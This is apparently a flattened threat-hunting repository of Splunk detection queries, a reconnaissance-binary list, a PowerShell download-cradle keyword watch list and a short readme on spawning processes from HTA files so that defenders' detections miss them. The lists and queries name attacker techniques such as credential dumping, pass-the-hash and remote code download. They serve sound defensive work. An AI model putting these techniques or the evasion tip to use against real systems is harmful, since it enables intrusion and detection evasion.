├── BigAssReconList.txt
├── CiscoDomain1M
├── HTAtricks
├── newproc.txt
├── newserv.hta
└── readme
├── PSDLCradleWatchList
├── README.md
├── SigmaRules
└── Sysmon
│ └── test.yml
├── Splunk
├── CMSTP
├── CreateRemoteThread
├── DCCredDump
├── DCOMShellWindows
├── DCenum
├── GoldenTicket
├── IEExecnetcon
├── JSC
├── MMCChild
├── Ransomware
├── SysmonNetConHelper
├── UACbypassreg
├── accessibilityabuse
├── attrib
├── batfileuser
├── bginfochild
├── bitsadmin
├── certutiladdroot
├── certutildownload
├── certutilencodedecode
├── cmdnotinsystem
├── copyB
├── cscartifacts
├── dbgsrvremote
├── debugwebconfig
├── dnscmd
├── dsadd
├── echoappend
├── explicitloginanalytic
├── explicitwmic
├── findstrnetstat
├── fltmc
├── funkyprocestree
├── githubcmdline
├── githubnobrowser
├── gscriptlocal
├── hashpassedviacmd
├── installutil
├── loaddllbypass
├── lsasstouchie
├── mavinject
├── meterpgetstystem
├── mpcmdrun
├── mshta
├── netuser
├── powershellrunspace
├── pth2
├── pthbasic
├── recyclebinexe
├── remoteenum
├── removedefenderdefinitions
├── roastiekerb
├── scheduledtaskCMDLine
├── selfdelete
├── shimreg
├── shimsdb
├── singlecharproc
├── startupexe
├── susprecyclebinfiles
├── trackerdllinj
├── vaultcmd
├── w3wpchild
├── wevtutil
└── wmitraceprocesscreate
├── SuspiciousPowershellScriptText
├── XMLcradle.txt
├── cmd.exe
├── evil.inf
├── evil.sct
├── generictest.txt
└── sendkeysPSCradle
/BigAssReconList.txt:
--------------------------------------------------------------------------------
1 | C:\Windows\Sys*\arp.exe
2 | C:\Windows\Sys*\at.exe
3 | C:\Windows\Sys*\bcdedit.exe
4 | *\bcp.exe
5 | C:\Windows\Sys*\cacls.exe
6 | C:\Windows\Sys*\chcp.com
7 | C:\Windows\Sys*\cscript.exe
8 | C:\Windows\Sys*\fsutil.exe
9 | C:\Windows\Sys*\ftp.exe
10 | C:\Windows\Sys*\ipconfig.exe
11 | C:\Windows\Sys*\klist.exe
12 | C:\Windows\Sys*\nbtstat.exe
13 | C:\Windows\Sys*\net.exe
14 | C:\Windows\Sys*\net1.exe
15 | C:\Windows\Sys*\netsh.exe
16 | C:\Windows\Sys*\nltest.exe
17 | *\psexec.exe
18 | C:\Windows\Sys*\reg.exe
19 | C:\Windows\Sys*\route.exe
20 | C:\Windows\Sys*\runas.exe
21 | C:\Windows\Sys*\sc.exe
22 | C:\Windows\Sys*\schtasks.exe
23 | C:\Windows\Sys*\sethc.exe
24 | *\sqlcmd.exe
25 | C:\Windows\System32\sysprep\sysprep.exe
26 | C:\Windows\Sys*\systeminfo.exe
27 | C:\Windows\Sys*\tree.com
28 | C:\Windows\Sys*\tasklist.exe
29 | C:\Windows\Sys*\vssadmin.exe
30 | C:\Windows\Sys*\whoami.exe
31 | C:\Windows\Sys*\winrm.cmd
32 | C:\Windows\Sys*\winrs.exe
33 | C:\Windows\Sys*\wmic.exe
34 | C:\Windows\Sys*\wscript.exe
35 | C:\Windows\Sys*\wusa.exe
36 | C:\Windows\Sys*\query.exe
37 | C:\Windows\Sys*\quser.exe
38 | C:\Windows\Sys*\qprocess.exe
39 | C:\Windows\Sys*\tracert.exe
40 | C:\Windows\Sys*\taskkill.exe
41 | C:\Windows\Sys*\wevtutil.exe
42 | C:\Windows\Sys*\taskeng.exe
43 |
--------------------------------------------------------------------------------
/CiscoDomain1M:
--------------------------------------------------------------------------------
1 | Cisco's top 1m popular domains. Useful for building a list to narrow down potential malicious C2. Not exactly sure how often this is updated.
2 |
3 | http://s3-us-west-1.amazonaws.com/umbrella-static/index.html
4 |
--------------------------------------------------------------------------------
/HTAtricks/newproc.txt:
--------------------------------------------------------------------------------
1 |
2 |
3 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/HTAtricks/newserv.hta:
--------------------------------------------------------------------------------
1 |
2 |
3 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/HTAtricks/readme:
--------------------------------------------------------------------------------
1 |
2 |
3 | should spawn new process or service from HTA without being a child of MSHTA(blue teamers will be looking for this).
4 |
5 | Sources
6 | https://twitter.com/enigma0x3/status/870810601483894784
7 | http://seclists.org/vuln-dev/2004/Mar/3
8 |
--------------------------------------------------------------------------------
/PSDLCradleWatchList:
--------------------------------------------------------------------------------
1 | *WebClient*
2 | *DownloadFile*
3 | *DownloadString*
4 | *DownloadData*
5 | *Start-BitsTransfer*
6 | *Msxml2.XMLHTTP*
7 | *WinHttpRequest*
8 | *WebRequest*
9 | *InternetExplorer.Application*
10 | *restmethod*
11 | *iex*(*iwr*
12 | *comobject*InternetExplorer*
13 | *System.Xml.XmlDocument*
14 | *nslookup -querytype=txt*
15 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ThreatHuntingStuff
2 |
3 | Lots of stuff coming soon. Need to start dumping my favorite Splunk queries. Company is currently switching webhosts, so past blog material is unavailable at the moment. I did upload a local HTML copy of the netshell helper DLL persistence/loading technique because it made Mitre's ATT&CK matrix this month. The link on the MITRE wiki is broken.
4 |
5 | https://attack.mitre.org/wiki/Technique/T1128
6 |
7 | Link to HTML view
8 |
9 | https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html
10 |
11 | 4/8/17 Sigma repo created
12 |
13 | Reference: https://github.com/Neo23x0/sigma
14 |
--------------------------------------------------------------------------------
/SigmaRules/Sysmon/test.yml:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Splunk/CMSTP:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 ParentProcessName="*\\cmstp.exe"
2 |
--------------------------------------------------------------------------------
/Splunk/CreateRemoteThread:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=8 ((SourceImage=*excel.exe OR SourceImage=*winword.exe OR SourceImage=*powerpnt.exe OR SourceImage=*msaccess.exe OR SourceImage=*visio.exe OR SourceImage=*ois.exe OR SourceImage=*infopath.exe OR SourceImage=*mspub.exe OR SourceImage=*vpreview.exe OR SourceImage=*pptview.exe OR SourceImage=*wordpad.exe OR SourceImage=*outlook.exe OR SourceImage=*acrord32.exe OR SourceImage=*acrobat.exe OR SourceImage=*PDFPlus.exe OR SourceImage=*java.exe OR SourceImage=*javaws.exe OR SourceImage=*javaw.exe OR SourceImage=*cmd.exe OR SourceImage=*powershell.exe OR SourceImage=*powershell_ise.exe OR SourceImage=*csc.exe OR SourceImage=*wscript.exe OR SourceImage=*jsc.exe OR SourceImage=*jscript.exe OR SourceImage=*vbc.exe OR SourceImage=*cscript.exe OR SourceImage=*verclsid.exe OR SourceImage=*mshta.exe OR SourceImage=*rundll32.exe OR SourceImage=*regsvr32.exe OR SourceImage=*regasm.exe OR SourceImage=*regsvcs.exe OR SourceImage=*installutil.exe OR SourceImage=*msbuild.exe) OR (TargetImage=*explorer.exe OR TargetImage=*lsass.exe OR TargetImage=*services.exe) OR (StartAddress=*0B80) OR ((SourceImage="C:\\Windows\\System32\\cscript.exe" OR SourceImage="C:\\Windows\\System32\\wscript.exe" OR SourceImage="C:\\Windows\\System32\\mshta.exe") TargetImage="C:\\Windows\\SysWOW64\\*"))
2 | |fields Computer, StartFunction, SourceImage, StartModule, TargetImage
3 | |eval StartFunction=if(isnull(StartFunction),"missing",StartFunction)
4 | |eval StartModule=if(isnull(StartModule),"missing",StartModule)
5 | |eval TargetImage=if(isnull(TargetImage),"missing",TargetImage)
6 | |eval SourceImage=if(isnull(SourceImage),"missing",SourceImage)
7 |
--------------------------------------------------------------------------------
/Splunk/DCCredDump:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ((Filename=vssadmin.exe (CommandLine="*create*" OR CommandLine="*shadowcopy*")) OR Filename=ntdsutil.exe OR Filename=diskshadow.exe)
2 |
--------------------------------------------------------------------------------
/Splunk/DCOMShellWindows:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=3 direction=inbound Filename=explorer.exe
2 | | where dest_port >= 49152| where SourcePort >=49152
3 |
--------------------------------------------------------------------------------
/Splunk/DCenum:
--------------------------------------------------------------------------------
1 | sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1 ((Image="*dsquery.exe" (CommandLine="*computer*" OR CommandLine="*group*" OR CommandLine="*server*" OR
2 | CommandLine="*user*")) OR (Image="*WMIC.exe" (CommandLine="* NAMESPACE: \\root\\directory\\ldap PATH ds_computer GET*" OR CommandLine="* NAMESPACE: \\root\\directory\\ldap PATH ds_group GET*" OR
3 | CommandLine="wmic* NAMESPACE: \\root\\directory\\ldap PATH ds_user GET*")) OR (Image="*net.exe" (CommandLine="*group*" OR CommandLine="*Domain Controllers*" OR CommandLine="*Domain Admins*"
4 | OR CommandLine="*/domain" OR CommandLine="*/domain *")))
5 |
--------------------------------------------------------------------------------
/Splunk/GoldenTicket:
--------------------------------------------------------------------------------
1 | sourcetype="XmlWinEventLog:Security" ((EventCode=4624 AuthenticationPackageName=Kerberos TargetDomainName="*.*") OR (EventCode=4672 (SubjectDomainName="-" OR SubjectDomainName="")))
2 |
--------------------------------------------------------------------------------
/Splunk/IEExecnetcon:
--------------------------------------------------------------------------------
1 | sourcetype="*wineventlog:microsoft-windows-sysmon/operational" EventCode=3 Filename="IEExec.exe" Initiated="true" | eval DestinationHostname = if(isnull(DestinationHostname), "Unknown", DestinationHostname)
2 |
--------------------------------------------------------------------------------
/Splunk/JSC:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 NewProcessName="*\\jsc.exe"
2 |
--------------------------------------------------------------------------------
/Splunk/MMCChild:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ParentFilename=mmc.exe Filename!=mmc.exe ParentCommandLine!="*.msc*" Filename!=ctfmon.exe
2 |
--------------------------------------------------------------------------------
/Splunk/Ransomware:
--------------------------------------------------------------------------------
1 | These rules look for commonly used built-in Windows commands used by ransomware to disable system recovery. They look for execution of vssadmin, bcdedit, and wbadmin by a single user account within 60 seconds of each other.
2 |
3 | Windows Security Log
4 |
5 | sourcetype="" EventCode=4688
6 | NewProcessName="C:\\Windows\\Sys*\\vssadmin.exe" OR
7 | NewProcessName="C:\\Windows\\Sys*\\bcdedit.exe" OR
8 | NewProcessName="C:\\Windows\\Sys*\\wbadmin.exe"
9 | |transaction SubjectUserName maxspan=60s
10 | |eval ProcCount = mvcount(NewProcessName)
11 | |where ProcCount > 1
12 | |table _time, host, SubjectUserName, NewProcessName, CommandLine
13 |
14 | Sysmon
15 |
16 | sourcetype="" EventCode=1
17 | Image="C:\\Windows\\Sys*\\vssadmin.exe" OR
18 | Image="C:\\Windows\\Sys*\\bcdedit.exe" OR
19 | Image="C:\\Windows\\Sys*\\wbadmin.exe"
20 | |transaction User maxspan=60s
21 | |eval ProcCount = mvcount(Image)
22 | |where ProcCount > 1
23 | |table _time,Computer, User, Image, CommandLine, ParentImage, ParentCommandLine
24 |
25 | Note: My Splunk instance only wants double backslashes when searching file paths. Yours may not. Some customization may be required.
26 |
27 |
--------------------------------------------------------------------------------
/Splunk/SysmonNetConHelper:
--------------------------------------------------------------------------------
1 | Useful helper script for correlating sysmon netcon logs with their process execution counterparts by tying them to the ProcessGuid.
2 | EventCode 3 events don't list the command line, parent process, or parent process command line of a process that communicates with another host.
3 | You can keep or remove the dports. It helps trim the noise. Most actors will try to exfil or use C2 over these ports.
4 |
5 |
6 | sourcetype="" (EventCode=1 Filename=".exe") OR
7 | (EventCode=3 Filename="" Initiated="true" DestinationPort=80
8 | OR DestinationPort=443 OR DestinationPort=53 OR DestinationPort=8080 )
9 | |eval PGUID=coalesce(ProcessGuid,ProcessGuid)
10 | | eval same_host = if(src_ip == dest_ip, "yes", "no")
11 | | search same_host = "no"
12 | |stats values(User) as User values(Computer) as
13 | Computer, values(Image) as Image, values(CommandLine) as CommandLine,
14 | values(ParentImage) as ParentImage, values(ParentCommandLine) as
15 | ParentCommandLine, values(DestinationHostname) as DestinationHostname,
16 | values(DestinationIp) as DestIp, values(DestinationPort) as DPort by PGUID|
17 | search CommandLine!="" AND DestIp!=""
18 |
19 |
20 |
21 | Update: 7/18/2017, some Sysmon EventCode 3 events have a ProcessGuid of all 0s, so correlation will not always be available, even when the EventCode 1 does have an EventCode 3 mate. More testing is needed.
22 |
--------------------------------------------------------------------------------
/Splunk/UACbypassreg:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode=12 OR EventCode=13 OR EventCode=14)
2 | (TargetObject="*\\mscfile\\shell\\open\\command*"
3 | OR TargetObject="*\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe*"
4 | OR TargetObject="*\\exefile\\shell\\runas\\command*")
5 |
--------------------------------------------------------------------------------
/Splunk/accessibilityabuse:
--------------------------------------------------------------------------------
1 | source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 (ParentImage=*\\WinLogon.exe OR ParentImage=*\\Utilman.exe) (Image=*\\cmd.exe OR Image=*\\net.exe OR Image=*\\Powershell.exe)
2 |
--------------------------------------------------------------------------------
/Splunk/attrib:
--------------------------------------------------------------------------------
1 | sourcetype=*WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1 Filename=attrib.exe CommandLine="* +h*"
2 |
--------------------------------------------------------------------------------
/Splunk/batfileuser:
--------------------------------------------------------------------------------
1 | sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 Filename=cmd.exe (CommandLine="*\\programdata\\*" OR CommandLine="*C:\\Users\\*") AND (ParentCommandLine="*.bat*" OR ParentCommandLine="*.cmd*") User!="NT AUTHORITY\\SYSTEM"
2 |
--------------------------------------------------------------------------------
/Splunk/bginfochild:
--------------------------------------------------------------------------------
1 | source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ParentImage=*\\bginfo.exe
2 |
--------------------------------------------------------------------------------
/Splunk/bitsadmin:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 NewProcessName="*\\bitsadmin.exe" (CommandLine="* \/transfer*" OR CommandLine="* \/download*" OR CommandLine="* \/addfile*" OR CommandLine="* \/upload*")
2 |
--------------------------------------------------------------------------------
/Splunk/certutiladdroot:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 NewProcessName="*\\certutil.exe" CommandLine="*-addstore*root*"
2 |
--------------------------------------------------------------------------------
/Splunk/certutildownload:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 NewProcessName="*\\certutil.exe" (CommandLine="*ping*" OR CommandLine="*split*")
2 |
--------------------------------------------------------------------------------
/Splunk/certutilencodedecode:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 NewProcessName="*\\certutil.exe" (CommandLine="*decode*" OR CommandLine="*encode*")
2 |
--------------------------------------------------------------------------------
/Splunk/cmdnotinsystem:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" ParentFilename="cmd.exe" ParentImage!="*\\Windows\\System32\\*" ParentImage!="*:\\Windows\\SysWOW64\\*" ParentImage!="*:\\Windows\\winsxs\\x86_microsoft-windows-commandprompt*" User!="*INFORMATICS\\*" User!="SANDBOX\\*" CommandLine!="C:\\Windows\\system32\\*" ParentImage!="*:\\Windows\\winsxs\\amd64_microsoft-windows-commandprompt*" ParentImage!="*:\\Windows\\winsxs\\WOW64_microsoft-windows-commandprompt*"
2 |
--------------------------------------------------------------------------------
/Splunk/copyB:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 copy
2 | | search CommandLine="*copy /b*"
3 |
--------------------------------------------------------------------------------
/Splunk/cscartifacts:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 (Filename=csc.exe OR Filename=vbc.exe OR Filename=Microsoft.Workflow.Compiler.exe) CommandLine!="*.cmdline*" CommandLine!="*.rsp*"
2 |
3 |
--------------------------------------------------------------------------------
/Splunk/dbgsrvremote:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=3 Filename=dbgsrv.exe Initiated=true
2 |
--------------------------------------------------------------------------------
/Splunk/debugwebconfig:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 aspnet_regiis
2 | | search NewProcessName="*\\aspnet_regiis.exe" CommandLine="-pd*"
3 |
--------------------------------------------------------------------------------
/Splunk/dnscmd:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 dnscmd.exe
2 | | search CommandLine="*/serverlevelplugindll*"
3 |
--------------------------------------------------------------------------------
/Splunk/dsadd:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventID=4688 Caller_User_Name!="*$" Caller_User_Name!="*svc*" NewProcessName=*\\dsadd.exe
2 |
--------------------------------------------------------------------------------
/Splunk/echoappend:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 (Filename=cmd.exe OR Filename=powershell.exe) (CommandLine="*@echo *" OR CommandLine="*@ echo *") CommandLine="*>>*" CommandLine="*&*"
2 |
--------------------------------------------------------------------------------
/Splunk/explicitloginanalytic:
--------------------------------------------------------------------------------
1 | sourcetype="XmlWinEventLog:Security" EventCode=4648| transaction user maxspan=15m | eval whatever=mvcount(dest) |
2 | where whatever>5
3 |
--------------------------------------------------------------------------------
/Splunk/explicitwmic:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventID=4648 WMIC.exe
2 | | search user!="*$" Process_Name="*WMIC.exe" Target_Server_Name!="localhost" Additional_Information!="localhost"
3 | | search Target_Server_Name!="*$*"
4 |
--------------------------------------------------------------------------------
/Splunk/findstrnetstat:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 (NewProcessName=*\\findstr.exe OR NewProcessName=*\\find.exe) (CommandLine=*445* OR CommandLine=*3389* OR CommandLine=*:22* OR CommandLine=*5985* OR CommandLine=*5986* OR CommandLine=*password*) user!="*$" user!=-
2 | | search NOT [|inputlookup PHX_WL_findstrnetstat.csv | fields - notes]
3 | | fillnull value=NULL| search CommandLine!=NULL
4 | | stats values(user) as user, values(Computer) as Computer, values(CreatorProcessName), count(CommandLine) as count by CommandLine
5 |
--------------------------------------------------------------------------------
/Splunk/fltmc:
--------------------------------------------------------------------------------
1 | sourcetype=*WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1 Filename=fltmc.exe (CommandLine="*unload*" OR CommandLine="*detach*")
2 |
--------------------------------------------------------------------------------
/Splunk/funkyprocestree:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
2 | (Filename="svchost.exe" ParentImage!="*:\\Windows\\system32\\services.exe" ParentImage!="*:\\Windows\\sysWOW64\\services.exe" ParentImage!="*:\\Windows\\system32\\svchost.exe" ParentImage!="*:\\Windows\\sysWOW64\\svchost.exe" ParentImage!="*:\\Windows\\system32\\rpcnet.exe" ParentImage!="*:\\Windows\\System32\\rpcnetp.exe" ParentImage!="*:\\Windows\\sysWOW64\\rpcnet.exe" CommandLine!="C:\\Windows\\System32\\svchost.exe -k LocalServiceAndNoImpersonation" User!="NT AUTHORITY\\*") OR
3 | (Filename="lsm.exe" ParentImage!="*:\\Windows\\system32\\wininit.exe" ParentImage!="*:\\Windows\\sysWOW64\\wininit.exe" User!="NT AUTHORITY\\*") OR
4 | (Filename="csrss.exe" ParentImage!="*:\\Windows\\system32\\smss.exe" ParentImage!="*:\\Windows\\sysWOW64\\smss.exe" ParentImage!="*:\\Windows\\system32\\svchost.exe" ParentImage!="*:\\Windows\\sysWOW64\\svchost.exe" User!="NT AUTHORITY\\*") OR
5 | (Filename="wininit.exe" ParentImage!="*:\\Windows\\system32\\smss.exe" ParentImage!="*:\\Windows\\sysWOW64\\smss.exe" ParentImage!="*:\\Windows\\system32\\svchost.exe" ParentImage!="*:\\Windows\\sysWOW64\\svchost.exe" User!="NT AUTHORITY\\*") OR
6 | (Filename="services.exe" ParentImage!="*:\\Windows\\system32\\wininit.exe" ParentImage!="*:\\Windows\\sysWOW64\\wininit.exe" ParentImage!="*:\\Windows\\explorer.exe" ParentImage!="*:\\windows\\system32\\services.exe" User!="NT AUTHORITY\\*") OR
7 | (Filename="srss.exe" ParentImage!="*:\\Windows\\system32\\smss.exe" ParentImage!="*:\\Windows\\sysWOW64\\smss.exe" User!="NT AUTHORITY\\*") OR
8 | (Filename="winlogon.exe" ParentImage!="*:\\Windows\\system32\\smss.exe" ParentImage!="*:\\Windows\\sysWOW64\\smss.exe" User!="NT AUTHORITY\\*") OR
9 | (Filename="smss.exe" User!="*\\SYSTEM") OR
10 | (Filename="taskhost.exe" ParentImage!="*:\\Windows\\system32\\services.exe" ParentImage!="*:\\Windows\\sysWOW64\\services.exe" ParentImage!="*:\\Windows\\system32\\svchost.exe" ParentImage!="*:\\Windows\\sysWOW64\\svchost.exe" ParentImage!="*:\\Windows\\system32\\taskhost.exe" ParentImage!="*:\\Windows\\sysWOW64\\taskhost.exe" User!="NT AUTHORITY\\*") OR
11 | (Filename="conhost.exe" ParentImage!="*:\\Windows\\system32\\csrss.exe" ParentImage!="*:\\Windows\\sysWOW64\\csrss.exe" CommandLine!="\\??\\C:\\windows\\system32\\conhost.exe 0xffffffff" CommandLine!="\\??\\C:\\windows\\system32\\conhost.exe 0xffffffff -ForceV1" User!="NT AUTHORITY\\*" ParentImage!="?")
12 |
--------------------------------------------------------------------------------
/Splunk/githubcmdline:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 github
2 | | search (CommandLine!="*GitHub.VisualStudio*" Filename!="VSInitializer.exe")
3 | | search NewProcessName!="C:\\Program Files\\Git\\*" NewProcessName!=*\\Chrome.exe NewProcessName!=*\\Firefox.exe NewProcessName!="*\\Iexplore.exe" CommandLine!=*\\PortableGit*
4 |
--------------------------------------------------------------------------------
/Splunk/githubnobrowser:
--------------------------------------------------------------------------------
1 | EventCode=3 sysmon github
2 | | search sourcetype="*wineventlog:microsoft-windows-sysmon/operational" Filename!=vmnat.exe Filename!=chrome.exe Filename!=firefox.exe Filename!=Iexplore.exe Filename!=MicrosoftEdgeCP.exe FileName!=MicrosoftEdge.exe
3 | | search DestinationHostname="*github*"
4 |
--------------------------------------------------------------------------------
/Splunk/gscriptlocal:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ParentFilename="Gpscript.exe" ParentCommandLine="*/logon" CommandLine!="*\\\\*" CurrentDirectory="C:\\windows\\System32\\GroupPolicy\\User\\Scripts\\Logon\\"
2 |
--------------------------------------------------------------------------------
/Splunk/hashpassedviacmd:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 |rex field=CommandLine "(?<CommandLineHash>\b[A-Fa-f0-9]{32}\b)" | search CommandLineHash="*" | table _time, dvc, Account_Name, NewProcessName, CommandLine, CommandLineHash, New_Process_ID, Creator_Process_Name
2 |
--------------------------------------------------------------------------------
/Splunk/installutil:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 NewProcessName="*\\installutil.exe" CommandLine="*/U *.exe"
2 |
--------------------------------------------------------------------------------
/Splunk/loaddllbypass:
--------------------------------------------------------------------------------
1 | source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 CommandLine="*\\Users\\*" (Image="*\\rundll32.exe" OR Image="*\\regsvr32.exe" OR Image="*\\regasm.exe" OR Image="*\\regsvcs.exe" OR Image="*\\installutil.exe") (ParentImage="*\\cmd.exe" OR ParentImage="*\\powershell.exe" OR ParentImage="*\\powershell_ise.exe" OR ParentImage="*\\csc.exe" OR ParentImage="*\\wscript.exe" OR ParentImage="*\\jsc.exe" OR ParentImage="*\\jscript.exe" OR ParentImage="*\\vbc.exe" OR ParentImage="*\\cscript.exe" OR ParentImage="*\\verclsid.exe" OR ParentImage="*\\mshta.exe" OR ParentImage="*\\msbuild.exe" OR ParentImage="*\\scrcons.exe" OR ParentImage="*\\IEExec.exe" OR ParentImage="*\\sh.exe" OR ParentImage="*\\odbcconf.exe" OR ParentImage="*\\hh.exe" OR ParentImage="*\\bash.exe" OR ParentImage="*\\caspol.exe" OR ParentImage="*\\pcalua.exe" OR ParentImage="*\\wmic.exe" OR ParentImage="*\\scriptrunner.exe" OR ParentImage="*\\mftrace.exe" OR ParentImage="*\\appvlp.exe")
2 |
3 | | rex field=CommandLine "(?i)[^\w](?<dll_name>\w+\.(dll|cpl))"
4 | | where isnotnull(dll_name)
5 | | where ProcessGuid != ParentProcessGuid
6 |
--------------------------------------------------------------------------------
/Splunk/lsasstouchie:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4663 ObjectName="\\Device\\*\\Windows\\System32\\lsass.exe"
2 |
--------------------------------------------------------------------------------
/Splunk/mavinject:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventID=4688 Caller_User_Name!="*$" Caller_User_Name!="*svc*" NewProcessName=*\\mavinject.exe
2 |
--------------------------------------------------------------------------------
/Splunk/meterpgetstystem:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 CommandLine="*cmd.exe* /c echo * \\\\.\\pipe\\*"
2 |
--------------------------------------------------------------------------------
/Splunk/mpcmdrun:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 NewProcessName="*\\mpcmdrun.exe" CommandLine="*remove*"
2 |
--------------------------------------------------------------------------------
/Splunk/mshta:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688
2 | | search (NewProcessName="*\\rundll32.exe" AND CommandLine="*mshtml*RunHTMLApplication*") OR (NewProcessName="*\\mshta.exe" AND CommandLine="*http*") OR (NewProcessName="*\\regsvr32.exe" CommandLine="*scrobj*")
3 | | rex field=CommandLine mode=sed "s/[^a-zA-Z0-9]//g"
4 |
--------------------------------------------------------------------------------
/Splunk/netuser:
--------------------------------------------------------------------------------
1 | source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 (Image=*\\net.exe OR Image=*\\net1.exe) (CommandLine="* use *") (CommandLine="*Admin$*" OR CommandLine="*C$*" OR CommandLine="*IPC$*" OR CommandLine="*D$*" OR CommandLine="*NETLOGON*" OR CommandLine="*SYSVOL*")
2 |
--------------------------------------------------------------------------------
/Splunk/powershellrunspace:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Security" EventCode=4688 NewProcessName!="*:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" NewProcessName!="*:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" NewProcessName!="*:\\Windows\\System32\\nbtstat.exe" NewProcessName!="*:\\Windows\\SysWOW64\\ARP.EXE" NewProcessName!="*:\\Windows\\System32\\sdiagnhost.exe"
2 | |eval itime = _time
3 | |join type=left max=0 Computer, NewProcessId [search sourcetype="*WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=53504 Sid!="S-1-5-18"| rename ComputerName as Computer| rex field=Message "\: (?<process_id>\w+) in"| eval ptime = _time| eval NewProcessId = lower(tostring(process_id,"hex"))| table Computer, NewProcessId, ptime, Message]
4 | | where (itime - 5 <= ptime AND ptime <= itime + 5) OR (isnull(itime))
5 | | eval ptime = strftime(ptime,"%x %X"), itime = strftime(itime,"%x %X")
6 | | table ptime, Computer, Message, NewProcessId, itime, NewProcessName, CommandLine
7 |
--------------------------------------------------------------------------------
/Splunk/pth2:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4624 Logon_Type=9 AuthenticationPackageName=Negotiate LogonProcessName=seclogo
2 | | search NOT IpAddress="::1"
3 |
--------------------------------------------------------------------------------
/Splunk/pthbasic:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Security" EventCode=4624 Logon_Type=3 Authentication_Package=NTLM| table _time, ComputerName, TargetUserName, Security_ID, Package_Name__NTLM_only_
2 |
--------------------------------------------------------------------------------
/Splunk/recyclebinexe:
--------------------------------------------------------------------------------
1 | source="*WinEventLog:Security" EventCode=4688 NewProcessName="*\\$recycle.bin\\*"
2 | | rename host as hostname_ip, NewProcessName as image, CommandLine as commandline
3 | | eval indicator_group = "Hostname: ".hostname_ip." Image:" .image." CommandLine: ".commandline
4 | | table hostname_ip, commandline
5 |
--------------------------------------------------------------------------------
/Splunk/remoteenum:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ((Filename=tasklist.exe OR Filename=systeminfo.exe OR Filename=taskkill.exe) CommandLine="*\/S *") OR ((Filename=sc.exe OR Filename=reg.exe) CommandLine="* \\\\*")
2 |
--------------------------------------------------------------------------------
/Splunk/removedefenderdefinitions:
--------------------------------------------------------------------------------
1 | source=XmlWinEventLog:Security EventCode=4688 NewProcessName="*\\mpcmdrun.exe" CommandLine="*remove*"
2 | | fillnull value=NA ParentProcessName
3 | | rename Computer as hostname_ip, SubjectUserName as username, NewProcessName as image, CommandLine as commandline, ParentProcessName as parent_image
